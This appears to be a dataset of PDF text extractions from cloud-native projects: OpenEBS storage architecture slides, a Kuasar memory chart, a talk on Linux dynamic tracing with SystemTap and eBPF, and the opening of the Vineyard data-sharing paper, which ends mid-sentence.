[ { "data": "GUI\nCLIZenkoAWS\nGCP\nAzureRING\nGCP XML APIS3 API\nAzure Storage APIS3 API\nS3 API" } ]
{ "category": "Runtime", "file_name": "OpenEBS Architecture and Design.pdf", "project_name": "OpenEBS", "subcategory": "Cloud Native Storage" }
[ { "data": "v0.6 \nFebruary 28, 2018 \nArchitecture and Design \nPrerequisites \n●Kubernetes Concepts : Namespaces, RBAC,CRD, Taints & Tolerations, Pod Anti \nAffinity, etc., \n●Kubernetes Storage Concepts: Running Stateful Workloads via PV, PVC, \nStorage Classes and Dynamic Provisioner \n●Kubernetes and CNCF Management Tools: Kube Dashboard, Prometheus, \nGrafana, Opentracing & Jaeger \n●Kubernetes Incubator Projects: Node Exporter, Node Problem Detector \n●Storage optimized for Containerized Applications \n●Stable, Secure and Scalable - Horizontally scalable to millions of Containers, Fault \ntolerant and Secure by default \n●Seamless integration into any private and public cloud environments. Vendor \nindependent. \n●Non-disruptive software upgrades \n●Easy to setup. Low entry barrier. Developer and Operators Friendly. \nDesign Goals and Constraints Persistent Volume Categories \nApp\nPVK8s Node \nApp\nPVApp\nPV\nStorage Server Vol Vol VolFilesystem / BlockDev NAS \nK8s Node \nApp\nPV\nVol VolApp\nPV\nVolApp\nPV\nFilesystem / BlockDev DAS \nK8s Node \nApp\nPVApp\nPVApp\nPV\nVol Vol Vol\nFilesystem / BlockDev CAS \nNAS - Network Attached Storage (Example: GPD, EBS, Storage Appliances) \nDAS - Direct Attached Storage (Example: hostDir, Local PV) \nCAS - Container Attached Storage (Example: OpenEBS) \nIndicates functionality like replication, snapshots, encryption, compression, etc. Represent stateful Pods like Databases, etc. Container Attached Storage \nK8s Node \nApp\nPVApp\nPVApp\nPV\nVol Vol Vol\nFilesystem / BlockDev CAS ○Storage Controllers (Targets) are running in \ncontainers. \n○These Storage Containers are orchestrated by \nKubernetes, just like any other workloads. \n●Installation and Upgrades \n●Monitoring \n●Debuggability \n○Storage Containers are mainly dealing with: \n●Disk/Storage Management \n●Data - High Availability and \n●Data - Protection \n“OpenEBS is a CAS solution, that provides storage as a service to stateful workloads. \nOpenEBS hooks-into and extends the capabilities of Kubernetes to orchestrate \nstorage services (workloads)” Kubernetes Cluster node2 \nFilesystem / BlockDev \nnode1 \nFilesystem / BlockDev Using OpenEBS Volumes \nPod\nStateful Workload \n(DB, etc) \nov-ctrl \n(iSCSI Target) \nov-rep-1 \n(replica) ov-rep-2 \n(replica) OpenEBS Volume \nSetup OpenEBS \n(StorageClasses \nStoragePools, Disks) Application \n(Deployment, PVC) \n(iSCSI PV) \n(iSCSI Initiator) OpenEBS Components \nKubernetes Cluster kube-dashboard Cluster \nAdmin \nkube-apiserver \nkube-heapster kube-etcd \nprometheus-maya grafana-maya \nmaya-apiserver kubelet (n) \nmaya-provisioner maya-nodebot (n) node_exporter (n) OpenEBS SC and CRD (StoragePools, VolumePolicies) (DaemonSets) \nThe source code for the control plane components is located in mainly openebs/maya repository. Developer \nor User \n(Deploy \nWorkload) \nOpenEBS PVCs *OV Pods (m) *Workloads(m) Node Storage Management \nK8s-node can be configured with Persistent Storage \nas:\n- Additional space on OS directory \n- NVMe Disks \n- SSD Disks \n- SAS Disks \n- SAN/NAS volumes \n- Object Store mounts \nOpenEBS Volume Replica ( OV Replica ) is a container \nrunning within a K8s Pod. OV Replica will be granted \naccess to local storage on the K8s-node using Local PV \nOptions like: \n- hostDir \n- Block Disks by mounting (/dev) * \n \nOpenEBS Control Plane manages the discovery, \nallocation to the OV Replica’s and monitoring of the \nstorage attached to the node. 
\n*https://github.com/kubernetes/kubernetes/issues/58569 \n*https://docs.google.com/document/d/1fG-KwUQNsuPYY40By\noBFqKJKpxzgyk7cQ5gqsGRXxfk/edit \nOV Replica \nPV(s) \nk8s-node \nConfig \nMapOpenEBS - CRDs (extended Schema) \nOpenEBS Control Plane uses Kubernetes etcd cluster to store the configuration information about \nOpenEBS related objects. \nWhile K8s primitives like PV, PVC, SC are used, they can in-turn refer to OpenEBS specific objects for \nfurther details. \nSome of the OpenEBS objects (CRDs) created by the OpenEBS Operator are: \n-Persistent Disk \n-Storage Pool \n-Storage Pool Claim \n-Persistent Volume Policy \nIn addition to the above generic CRDs used by the openebs control plane, there can be custom CRDs \nspecific to the Storage Engines like cStor: \n-cStorPool \n-cStorVolume \nStorage Schema - PersistentDisk \nNVMe SSD \n SAS Disks HostDir SAN/NAS S3 \n NVDIMM SSDs \nPersistentDisk (PD), \nlogical representation \nof the underlying \nstorage attached to a \nnode. K8s node \nPD(s) kube-etcd maya-nodebot \nnode-problem-detector DaemonSets/System Pods Storage Schema - StoragePools \nNVMe SSD \n SAS Disks HostDir SAN/NAS S3 \n NVDIMM SSDs \nPersistentDisk (PD), \nlogical representation \nof the underlying \nstorage attached to a \nnode. K8s node \nPD(s) kube-etcd maya-nodebot \nnode-problem-detector DaemonSets/System Pods maya-cstor\n-operator \nSPC(s) \nfile/block SP(s) \n(type=file) cStor Pool \nSP(s) \n(type=block) Storage Schema - OpenEBS Volumes \n(Replicas) \nNVMe SSD \n SAS Disks HostDir SAN/NAS S3 \n NVDIMM SSDs \nPersistentDisk (PD), \nlogical representation \nof the underlying \nstorage attached to a \nnode. K8s node \nPD(s) kube-etcd maya-nodebot \nnode-problem-detector DaemonSets/System Pods maya-cstor\n-operator \nSPC(s) \nfile/block SP(s) \n(type=file) cStor Pool \nSP(s) \n(type=block) OV Replica \n(jiva) \nPV\n(hostdir) OV Replica \n(block) OV Ctrl \n(jiva) OV Ctrl \n(cStor) maya-nodebot \nAPIs (https / gRPC) \nCollector \nDiscoverer Provisioner Monitor CLI (COBRA) \nkube-etcd prometheus-maya \nOS Utilities / Daemons kube custom controller and etcd cachestor Metrics Maya-nodebot runs on \neach node as a \ndaemon-set. \nHas access to the \nunderlying disk subsystem \nand can handle the disk \nadd/lost events and can \nmonitor for disk errors. \nDisk details and status \n(lost/deleted/healthy) are \nupdated as CR into the \netcd. \nDisks are monitored for IO \nstats and smart and \nmetrics can be collected \nvia prometheus. \nWhen critical events are \nobserved (say disk lost \nfrom an active pool) calls \nmaya-apiserver for \nhandling or can call the \nReplica impacted. maya-apiserver \nAPIs (https / gRPC) \nOV Provisioner CLI (COBRA) \nkube-etcd \nK8s Orchestrator Provider maya-provisioner \nkube-apiserver OV Snapshots \nOV Metrics OV Profiles \nmaya-mulebot \nOV (replica) OV (target) prometheus-maya maya-provisioner \nAPIs (https / gRPC) \nCreate CLI (COBRA) \nkube-etcd \nK8s Dynamic Controller maya-apiserver \nkube-apiserver Metrics Update Delete prometheus-maya maya-volume-exporter \nAPIs (https / gRPC) \nCollector CLI (COBRA) \nprometheus-maya OpenEBS Volume Exporter grafana-maya maya-mulebot (TBD) State Diagrams \nOpenEBS Volume - State Diagram \ndoes-not-exist initializing running deleting \nerrored degraded \noffline migrating Sequence Diagrams \n(TBD) \nUI \n(Kubernetes \nDashboard) \nTODO - Could list OpenEBS Volumes created using this Storage class Should include outstanding alerts at the top of the page. Storage: \navail/used \nOn each \npod. 
\nShould include Events at the bottom of the page. " } ]
{ "category": "Runtime", "file_name": "mem-test.pdf", "project_name": "Kuasar", "subcategory": "Container Runtime" }
[ { "data": " 0 200 400 600 800 1000\n 0 10 20 30 40 50Pss(MB)\nNumber of PodsKata\nKuasar" } ]
{ "category": "Runtime", "file_name": "systemtap-and-go.pdf", "project_name": "OpenEBS", "subcategory": "Cloud Native Storage" }
[ { "data": "Dynamic \nInstrumentation\n@JeffryMolanus @openebsGolang Meetup Bangalore XXIV\n15 July 2017Tracing\n•To record information about a programs execution\n•Useful for understanding code, in particular a very large code base\n•Used during debugging, statistics, so on and so forth\n•Dynamic tracing is the ability to ad -hoc add or remove certain instrumentation without \nmaking changes to the code that is subject to tracing or restarting the program or system\n•In general, tracing should not effect the stability of the program that is being traced in \nproduction, during development its less of importance\n•When no tracing is enabled there should be no overhead; when enabled the overhead \ndepends on what is traced and how \n•User land tracing requires abilities in kernel (which is the focus of this talk)\n•user space tracing has a little more overhead due to the induced context switchTracers on other platforms\n•Illumos/Solaris and FreeBSD\n•Dtrace, very powerful and production safe used for many years\n•Compressed Type Format (CTF) data is available in binaries and libraries, no \nneed for debug symbols to work with the types\n•Solaris uses the same CTF data for type information for debugging\n•Event Tracing for Windows (EWT)\n•Linux\n•Requires debug symbols to be downloaded depending on what you trace and how \nspecific you want to trace\n•With DWARF data more can be done then with plain CTF howeverBasic architecture of tracing\n•There are generally, two parts of tracing in Linux\n•Frontend tools to work/consume with/the in kernel tracing \nfacilities\n•We will look briefly in ftrace, systemtap and BCC \n•Backend subsystems\n•Kernel code that executes what ever code you want to be \nexecuted on entering the probes function or address\n•kprobes, probes, tracepoints, sysdigftrace\n•Tracepoints ; static probes defined in the kernel that can be enabled at \nrun time\n•ABI is kept stable by kernel \n•static implies you have to know what you want to trace while \ndeveloping the code\n•Makes use of sysfs interface to interact with it \n•Several wrappers exist to make things a little easier\n•tracecmd and kernelshark (UI)\n•Also check the excellent stuff from Brendan GreggAdding a tracepoint\nTrace points in sysfs\nkernelshark\nkprobes\n•kprobes is defined in multiple sub categories\n•jprobes : trace function entry (optimised for function entry, copy stack)\n•kretprobes : trace function return \n•kprobes : trace at any arbitrary instruction in the kernel\n•To use it one has to write a kernel module which needs to be loaded at run \ntime\n•this is not guaranteed to be safe\n•A kprobe replaces the traced instruction with a break point instruction\n•On entry, the pre_handler is called after instrumenting, the post handlerkprobes\nKprobe example\nKprobe example\njprobes\n•Note: function \nprototype needs to \nmatch the actual \nsyscall\nutrace/uprobes\n•Roughly the the same as the kprobe facility in the kernel but focused \non user land tracing\n•current ptrace() in linux is implemented using the utrace frame work\n•tools like strace and GDB use ptrace()\n•Allows for more sophisticated tooling, one of which is uprobes\n•Trace points are placed on the an inode:offset tuple\n•All binaries that map that address will have a SW breakpoint \ninjected at that addressftrace & user space\n•The same ftrace interface is available for working with uprobes\n•Behind the scene the kernel does the right thing (e.g use kprobe, \ntracepoints, or uprobes)\n•The same sysfs interface is used, general work 
flow:\n•Find address to place the probe on\n•Enable probing\n•Disable probing\n•View results (flight recorder)eBPF\n•Pretty sure everyone here has used \nBPF likely with out knowing\n•tcpdump uses BPF\n•eBPF is enhanced BPF\n•sandboxed byte code executed by \nkernel which is safe and user \ndefined\n•attach eBPF to kprobes and \nuprobes\n•certain restrictions in abilities\nBCC\n•BPF Compiler Collection, \ncompiles code for the in kernel \nVM to be executed\n•Several high level wrappers for \nPython, lua and GO\n•Code is still written in C \nhowever\nRecap\n•Several back -end tracing capabilities in the kernel\n•Tracepoints, kprobes, jprobes, kretprobes and uprobes\n•eBPF allows attachment to kprobe, uprobes and tracepoints for \nsafe execution \n•Linux tracing world can use better generic frontends for adhoc \ntracing\n•Best today are perf and systemtap (IMHO)\n•Who wants to write C when you want to print a member of a \ncomplex struct? (ply)Systemtap\n•High level scripting language to work with the aforementioned tracing \ncapabilities of Linux\n•Flexible as it allows for writing scripts that can trace specific lines \nwithin a file (debug symbols)\n•Next to tracing, it can also make changes to running programs when \nrun in “guru mode”\n•Resulting scripts from systemtap are kernel modules that are loaded \nin to the kernel (kprobe and uprobes)\n•Adding a eBPF target is in the works as currently, systemtap may \nresult in unremovable modules or sudden death of traced processesstp files\n•Example script oneliner: \n•stap -e ‘probe syscall.open { printf(“exec %s, file%s, execname(), \nfilename) }’\n•stap -L ‘syscall.open'\n•syscall.open: __nr:long name:string filename:string flags:long \nflags_str:string mode:long argstr:string\n•List user space functions in process “trace”\n•stap -L ‘process(“./trace\").function(\"*\")'\n•.call and .return probes for each function List probes\nTracing line numbers\n•What's the value of ret after \nline 35?\n•Could be done by tracing ret \nvalues, but that is not the \npurpose of this exercise\n•gcc -g -O0 \n•full debug info\nTracing line number\n•.statement(“main@code/talk/trace.c:36”) { … }\nUnderstanding code flow\nUnderstanding code flow\nDownstack\n•All functions \nbeing called by \na function\nTracing go\nCant trace return values\nCalling convention\n•AMD64 calling conventions\n•RDI, RSI, RDX, RCX, R8 and R9\n•Go is based on PLAN9 which uses a different approach therefore tracing does not work as \nwell as one would like it to be (yet)\n•This also goes for debuggers\n•Perhaps Go will start using the X86_64 ABI as it moves forward or all tools and debuggers \nwill add specific PLAN9 support\n•https://go -review.googlesource.com/#/c/28832/ (ABI change?)\n•GO bindings to the BCC tool chain\n•Allows for creating eBPF tracing tools written in go\n•but still requires writing the actual trace logic in CSummary\n•Dynamic tracing is an invaluable tool for \nunderstanding code flow\n•To verify hypotheses around software bugs or \nunderstanding\n•Ability to make changes to code on the fly with out \nrecompiling (guru mode)\n•Under constant development most noticeable the \neBPF/BCC work" } ]
{ "category": "Runtime", "file_name": "vineyard-sigmod-2023.pdf", "project_name": "Vineyard", "subcategory": "Cloud Native Storage" }
[ { "data": "200Vineyard: Optimizing Data Sharing in Data-Intensive\nAnalytics\nWENYUAN YU, Alibaba Group, China\nTAO HE, Alibaba Group, China\nLEI WANG, Alibaba Group, China\nKE MENG, Alibaba Group, China\nYE CAO, Alibaba Group, China\nDIWEN ZHU, Alibaba Group, China\nSANHONG LI, Alibaba Group, China\nJINGREN ZHOU, Alibaba Group, China\nModern data analytics and AI jobs become increasingly complex and involve multiple tasks performed on\nspecialized systems. Sharing of intermediate data between different systems is often a significant bottleneck in\nsuch jobs. When the intermediate data is large, it is mostly exchanged through filesin standard formats ( e.g.,\nCSV and ORC), causing high I/O and (de)serialization overheads. To solve these problems, we develop Vineyard ,\na high-performance, extensible, and cloud-native object store, trying to provide an intuitive experience for\nusers to share data across systems in complex real-life workflows. Since different systems usually work on data\nstructures ( e.g.,dataframes, graphs, hashmaps) with similar interfaces, and their computation logic is often\nloosely-coupled with how such interfaces are implemented over specific memory layouts, it enables Vineyard\nto conduct data sharing efficiently at a high level via memory mapping and method sharing. Vineyard provides\nan IDL named VCDL to facilitate users to register their own intermediate data types into Vineyard such that\nobjects of the registered types can then be efficiently shared across systems in a polyglot workflow. As a\ncloud-native system, Vineyard is designed to work closely with Kubernetes, as well as achieve fault-tolerance\nand high performance in production environments. Evaluations on real-life datasets and data analytics jobs\nshow that the above optimizations of Vineyard can significantly improve the end-to-end performance of data\nanalytics jobs, by reducing their data-sharing time up to 68.4 ×.\nCCS Concepts: •Computer systems organization →Cloud computing ;•Theory of computation →\nData exchange ;•Information systems →Key-value stores .\nAdditional Key Words and Phrases: data sharing, in-memory object store\nACM Reference Format:\nWenyuan Yu, Tao He, Lei Wang, Ke Meng, Ye Cao, Diwen Zhu, Sanhong Li, and Jingren Zhou. 2023. Vineyard:\nOptimizing Data Sharing in Data-Intensive Analytics. Proc. ACM Manag. Data 1, 2, Article 200 (June 2023),\n27 pages. https://doi.org/10.1145/3589780\nAuthors’ addresses: Wenyuan Yu, Alibaba Group, China, Beijing; Tao He, Alibaba Group, China, Beijing; Lei Wang, Alibaba\nGroup, China, Beijing; Ke Meng, Alibaba Group, China, Beijing; Ye Cao, Alibaba Group, China, Beijing; Diwen Zhu, Alibaba\nGroup, China, Shanghai; Sanhong Li, Alibaba Group, China, Shanghai; Jingren Zhou, Alibaba Group, China, Hangzhou,\nvineyard@alibaba-inc.com.\nPermission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee\nprovided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the\nfull citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored.\nAbstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires\nprior specific permission and/or a fee. Request permissions from permissions@acm.org.\n©2023 Copyright held by the owner/author(s). 
Publication rights licensed to ACM.\n2836-6573/2023/6-ART200 $15.00\nhttps://doi.org/10.1145/3589780\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:2 Wenyuan Yu et al.\nFraud Label \nPropagation \n(Graph: libgrape-lite) Fraud User \nClassifier Training \n(NN: PyTorch) \nCSV/TSV/ORC Files on External Storage (e.g., Alluxio, S3, HDFS) User Filtering \n/ Feature Join \n(SQL /gid29/gid3 Pandas) ETL / Graph \nGeneration \n(SQL /gid29/gid3 Pandas) Raw Logs \nBarrier Barrier Barrier Workloads … Workloads …\nFig. 1. A Real-life Fraud Detection Job.\n1 INTRODUCTION\nData-intensive computing is a typical class of big data analytics applications, and most of their\nprocessing time is devoted to I/O and data movement and manipulation [ 4,48]. Recent stud-\nies [25,36,51] have reported that many jobs submitted to cloud platforms fall into this category.\nIn addition, there is an increasingly new trend where multiple tasks belonging to different types of\nworkloads are fused together to form a single complex job (workflow) [ 41,61,64]. Figure 1 depicts a\nreal-life fraud detection job from Alibaba [ 23], in which diverse kinds of workloads ( e.g.,SQL, graph\nprocessing, and deep learning) are involved. Consequently, handling such complex data-intensive\njobs efficiently is highly desired.\nIn response, two practical solutions have been proposed, namely single-system andmulti-\nsystem , but both of them still leave large room for improvement. The single-system copes with\ndiverse workloads in a single general-purpose system like Spark [ 63,64]. Unfortunately, a workload\nimplemented in general-purpose systems often performs worse than that in workload-specific\nsystems, which are tailored for a particular type of workload. Workload-specific systems ( e.g.,\nGemini [ 67] for graph processing) adopt specialized data structures ( e.g.,CSR/CSC for graphs) and\noptimizations in their execution engines to offer superior performance. Sometimes, the performance\ngap can reach up to several orders of magnitudes [47, 53].\nThus, a more widely-adopted solution to handling complex data analytics is multi-system ,\nwhere users employ multiple workload-specific systems to handle different types of workloads. To\nexchange intermediate results between these systems, filesin standard formats ( e.g.,CSV and ORC)\non external storage ( e.g.,HDFS [ 57], Amazon S3 [ 10], and Alluxio [ 40]) are commonly used, as\nshown in Figure 1. In this way, different systems can be nicely bridged, but the cost of data sharing\nacross systems becomes higher than that in single-system (e.g.,Spark). The root cause is that the\ninterfaces for files ( i.e.,read and write) are primitive and unstructured. Hence, dumping/loading\ndata as files can incur unnecessary copying, (de)serializations and/or I/Os. Moreover, instances of\nhigh-level data structures ( i.e.,objects) lose their rich semantics and behaviors when flattened to\na sequence of bytes. It requires systems to repeatedly implement their own in-memory formats\nand methods, as well as the (de)serialization logic. Such loss of semantics also makes it difficult\nto apply cross-system optimizations ( e.g.,pipelined execution and computation-data co-locating).\nTo tackle the above issues, we present Vineyard , a distributed object store for data sharing across\nworkload-specific data processing systems. We observe that various workload-specific systems\nare built on top of some common data structures ( e.g.,dataframes and graphs). 
Although data\nstructures of the same type often have different memory layouts and implementations in different\nsystems, their high-level interfaces keep almost the same [ 33]. This observation inspires us to\noffer customizable common memory layouts and implementations for intermediate data structures\nshared by multiple systems, and enable the efficient in-memory sharing of these data structures\nand their associated interfaces and methods among different systems written in different languages.\nIn this fashion, different systems can access objects inVineyard just like the high-level native\nobjects of their own. Vineyard supports zero-copy data sharing by decoupling an object into\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:3\nmetadata and a group of payloads, allowing users to reconstruct a complex object from memory-\nmapped payloads in different processes with metadata. Vineyard organizes large objects in chunk\ngranularity, allowing each chunk spilled to an external storage or distributed in remote hosts to\nsupport big data. Like Protobuf [ 35],Vineyard provides an IDL (intermediate description languages)\nnamed VCDL for users to define new formats to alleviate the integration burden with Vineyard .\nBesides, Vineyard is designed to be cloud-native and work robustly and efficiently in real-world\nworkflows. Vineyard is open-sourced1and under active development. It is already integrated\nor being integrated with more than a dozen data processing systems including PyTorch [ 52],\nTensorFlow [ 8], PowerGraph [ 34], GraphScope (distributed graph computation systems) [ 23] and\nMars (large-scale scientific computation engine) [45].\nContributions & organization. We make the following contributions to facilitate and speed up\ncross-system data sharing:\n(1) Motivation (§2). We analyze the current solutions for data sharing from the aspects of data\nstorage medium and data format to reveal the reasons why current solutions fail in complex\nworkflows.\n(2) System (§3). We first describe the opportunity that Vineyard tries to seize. Then we detail the\nsystem architecture of Vineyard , and its components, and discuss the challenges to achieve our\ndesign goal.\n(3) Implementation (§4). We detail the implementation of Vineyard from three aspects: (i) A dis-\ntributed in-memory object store for composable data structures ( §4.1). (ii) The VCDL IDL and\ncode generator to facilitate the type registration and integration ( §4.2). (iii) Locality awareness on\nKubernetes clusters [7] and fault tolerance in cloud environments ( §4.3).\n(4) Use cases (§5). We provide a set of Vineyard integration use cases with six data processing\nsystems, which demonstrates the integration friendliness of Vineyard .\n(5) Evaluation (§6). An extensive evaluation of Vineyard . We find the following: (i) Vineyard can\nboost the end-to-end performance by 3 ×times on average and reduce the data-sharing time by\n28.8×on average compared with its best competitors. (ii) The overhead of Vineyard is negligi-\nble, which only takes about 40 milliseconds to share hundreds of Gigabytes of objects. (iii) The\nintegration effort is low which only requires about 100 lines of changes for a system.\nLimitations and non-goals. Vineyard has a number of restrictions and non-goals. First, Vine-\nyard targets at optimizing data sharing across systems for data-intensive workflows. 
As for\ncomputation-dense workflows such as model training, the end-to-end performance improvement\nis quite limited since most of their execution time is devoted to computational kernels. Second,\nVineyard does not provide a global workflow optimizer and always assumes users have chosen\nan appropriate workload-specific system for each task, while some prior studies ( e.g., Muske-\nteer [ 33]) aim to map tasks to suitable back-end execution systems. Third, Vineyard aims at the\nsharing of large immutable intermediate results, while the caching of frequently updated data like\nMemcached [20] or Redis [44] is not our goal.\n2 MOTIVATION\nTo enable data sharing among different systems, diverse solutions have been proposed. Their\nfundamental differences mainly come from where the intermediate data is stored ( i.e.,storage\nmedium), and how the data is represented ( i.e.,format).\n1Vineyard is available at https://github.com/v6d-io/v6d\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:4 Wenyuan Yu et al.\nStorage medium. In general, existing solutions utilize either main memory orexternal storage\nto share data across systems. However, many challenging issues still exist in handling large and\ndistributed data under diverse running environments.\nMemory. Memory can be used as a medium for sharing data among different libraries and systems\non a single machine. For example, in the PyData ecosystem, libraries, such as Numpy [ 15] and\nPyTorch, can exchange a large tensor as a variable directly within a single Python process with\nzero copying. Some multi-process parallel computation systems use shared memory for exchanging\nintermediate data across processes. An object store Plasma developed for Apache Arrow [ 31] and\nRay [ 49] also allows sharing of immutable data (objects) between processes with simple PUT/GET\noperations in shared memory. Memory provides an efficient way to exchange data across systems\non a single machine avoiding unnecessary copying and/or I/Os with external storage. However,\nmemory-based solutions are difficult to scale. First, intermediate data is required to locate on a\nsingle machine and fit in the main memory, while existing solutions lack the support of distributed\nor outsized data, both are pivotal to real-life big data applications. Second, memory-based solutions\nsometimes require ad-hoc and specialized integrations between pairs of involved systems/libraries.\nExternal storage. Different from memory, external storage ( e.g.,local disks, HDFS and Amazon\nS3) often provides primitive yet unified file system-like interfaces ( e.g.,open ,read andwrite ).\nFurthermore, its capacity can be considered unlimited in cloud environments. As a result, external\nstorage-based solutions can bridge different systems without intrusive changes to the data process-\ning system itself, and are appropriate to exchange extremely large-scale data. However, compared\nwith memory-based solutions, the performance of external storage-based solutions is relatively\npoor due to the following reasons. First, intermediate data is stored as files in file systems ( e.g.,\nORC and Parquet files), while dumping/loading data as files will incur expensive copying and I/O\noverheads. Second, each system needs to access files ( i.e.,a sequence of bytes) through primitive file\ninterfaces, while high-level data structures contain rich semantics and methods ( e.g.,thefind(key)\nmethod for a hashmap). 
To keep rich semantics of high-level data structures, each system needs\nto build its internal data structures from a sequence of bytes, causing (de)serialization costs. For\nexample, to execute the complex job shown in Figure 1 over external storage, the costs for data\nsharing across systems take over 40%of end-to-end execution time (see §6).\nMore recently, some work, such as Alluxio and JuiceFS [ 39], tries to alleviate the high I/O cost in\nexternal storage-based solutions, by caching frequently accessed data in memory and local SSDs\nwhile keeping the less used data in external storage. Unfortunately, its interfaces are based on files,\nand still suffer from excessive data copying and (de)serialization overheads. For example, to share\nthe 200GB neuraltalk2 dataset [ 46] from Numpy to PyTorch, conducting it over Alluxio in .npy\nfiles requires 656 seconds while the cost is nearly zero with in-memory sharing within the Python\nprocess.\nFormat. To share intermediate data, systems must agree with the data format, i.e.,how the data\nshould be organized and represented. To this end, much effort has been devoted to defining some\nstandard data formats to represent commonly used data structures, such as columnar format and\nORC for table-like data, and multi-dimensional array for tensors. With these standard data formats\nin place, data processing systems only need to implement adaptors to read/write standard formats.\nHowever, there still exist some circumstances where standard data formats cannot work well.\nFirst, in many cases, there are often some differences between a standard data format and the\ninternal data structure defined in a specific system. As a result, it takes some transformation and\n(de)serialization costs for the data processing system to convert data between the standard formats\nand its internal data structures. For example, Apache Dremio [ 30] uses Apache Arrow as its internal\ncolumnar data format. When facing ORC files, it requires an extra (de)serialization process to write\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:5\ntorch /gid17Tensor \nnumpy.ndarray (a) (b) livegraph::Graph \nPayload for (v=0; v<MAXV; v++){ \n auto iter = g.get_edges(v); \n whlie (iter.valid()){ \n ... \n Update(v, iter) \n ... \n iter.next(); \n } \n}\nGraphScope::Fragment \nPayload for (v=0; v<g.vsize(); v++){ \n auto iter = g.edges(v); \n whlie (iter.has_next()){ \n ... \n Update(v, iter) \n ... \n iter++; \n } \n}Payload: Payload: \n1 Gigabytes \nMetadata: \nMetadata: .size= torch.Size( /gid62512,512 /gid15512]) \n.dtype= torch.int64 \n.shape= (512,512 /gid15512) .size= 134217728 \n.dtype= np.int64 .data= <memoryref> \n1 Gigabytes Methods: \n__getitem__(key); \nMethods: \n__getitem__(key); v0v1v2\nv0v1v2\nadj(v 0)adj(v 0)\n.data= <memoryref> \nFig. 2. The data structure commonality when (a) the layouts of tensor payloads are the same while only differ\nin metadata, (b) the layouts of graph differ between adj list and CSR, while the interfaces defined on them\nare similar.\nto (read from) ORC files even though ORC is also organized in columnar formats. Second, there\nis still a lack of standard formats for many commonly-used data structures ( e.g.,hashmaps and\ngraphs). As a result, their implementations vary a lot in different systems. Under such a situation,\nan internal data structure has to be serialized into primitive and flatdata formats. 
For example,\nhashmaps are usually shared as a sequence of key-value pairs, and then rebuilt from scratch by the\nreceiver. During this process, high-level data structures lost their semantics ( e.g.,key lookups for a\nhashmap), amplifying the unnecessary transformation and (de)serialization overheads.\nInsights. Based on the above analysis, an underlying framework that can make data sharing across\nsystems more efficient and flexible has to simultaneously satisfy the following requirements.\n(1) On the data medium side, it should be able to provide an efficient in-memory data-sharing\nmechanism while supporting distributed and outsized data with external storage, and minimizing\ndata copying, I/O and network overheads.\n(2) On the data format side, it should allow developers to easily define and implement new and\ncomplex data structures, and make the data format used for intermediate data consistent with the\ninternal data structures in data processing systems when possible, to avoid unnecessary overheads\nsuch as data transformation and (de)serialization.\n3 APPROACH AND CHALLENGES\nOpportunity: many intermediate data structures share some commonalities across differ-\nent systems. In general, a data structure can be conceptually broken down into payloads ,metadata\nand methods , as shown in Figure 2 (a). The main parts that hold the actual data are payloads ,\nwhich correspond to a continuous memory space ( e.g.,the 1GB buffer in Tensor ), and metadata\nprovide necessary attributes ( e.g.,.size and.dtype forTensor ) to interpret the payloads. Besides,\nmethods provide high-level and opaque interfaces ( e.g.,__getitem__(key) forTensor ) for users\nto manipulate the data. We found the data structures in diverse data processing systems do share\nsome degree of commonalities. They can be divided into the following categories:\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:6 Wenyuan Yu et al.\n(1)Payload commonality: The memory layouts of the payloads of the upstream and downstream\nsystems are exactly the same, but only differ in the organization of metadata in the data structure.\nFor example, DataFusion [ 28] and Polars [ 17] have payload commonality, since their underlying\ndata structures both are based on Apache Arrow. As another example, shown in Figure 2 (a), both\nPyTorch and NumPy process tensors. The layout of payload buffers of the tensor type in these\ntwo systems are exactly the same but only differ in metadata. Compared to the payload (1GB), the\nspace to keep their metadata is negligible. To leverage such commonalities for data sharing, one\ncan re-create the metadata of the shared object in another system with little overhead, as long as\nthe (de)serialization, copying and I/O over the payloads between two systems can be avoided ( e.g.,\nvia memory mapping). And such sharing is called payload sharing .\n(2)Interface commonality: The layout of payloads of data structures of upstream and downstream\nsystems differ from each other, but the provided interfaces follow the same logic and semantics.\nWe can find many interface commonalities in big-data ecology. (i) The index data structures, e.g.,\ntrees, hashmaps, or filters, can be implemented in different ways, while their exposed interfaces are\nsimilar, e.g.,exist(key) ,size() . 
(ii) The main abstraction of Spark is a resilient distributed dataset\n(RDD), a collection of elements partitioned across hosts of a cluster that can be operated in parallel.\nData structures that implement interfaces over RDD can be processed in Apache Spark without\nchanging the physical memory layout. (iii) GraphScope and LiveGraph [ 68] represent graphs in\ndifferent ways. However, they both provide adjacency-list-like interfaces on their data structures,\nas shown in Figure 2 (b). To leverage this kind of commonality for data sharing, one can write a\nwrapper around the methods of objects in the upstream system to provide the interfaces for the\ndownstream system, instead of a thorough conversion, and such sharing is called method sharing .\n(3) In other situations, data structures of upstream and downstream systems are totally irrelevant\nor systems do engine-specific optimizations such as manipulating the raw data. For example,\nClickHouse [ 19] and Apache Doris [ 29] enable engine-specific optimization such as vectorization\nand data compression. It is intractable to share intermediate data between them without a physical\nconversion or non-intrusive modification. This kind of conversion often requires time-consuming\ndata scans and is inevitable in this case.\nTo seize the opportunity, we propose Vineyard , an off-the-shelf distributed object store for\nefficient cross-system data sharing, exploiting both payload and interface commonalities for in-\nmemory data sharing in cloud environments. At the same time, it insulates users from cumbersome\ndata alignment boilerplate code by providing simple put() andget() APIs, allowing users to\nput objects in a system and get them back in another system without suffering the pain of I/Os,\n(de)serialization, annoying glue code, and inefficient cross-language interaction.\n3.1 System Overview\nArchitecture of Vineyard .Figure 3 depicts the architectural overview of Vineyard . Compared\nwith file system-based data-sharing solutions, Vineyard stores intermediate data as objects , and\nintroduces a novel data-sharing mechanism to achieve high performance and flexibility while\nkeeping the cost of integration as low as possible. Overall, Vineyard consists of seven modules:\nVineyard client (labeled by\n1 ).Vineyard provides a SDK supporting multiple programming\nlanguages (including C/C++, Python, Java 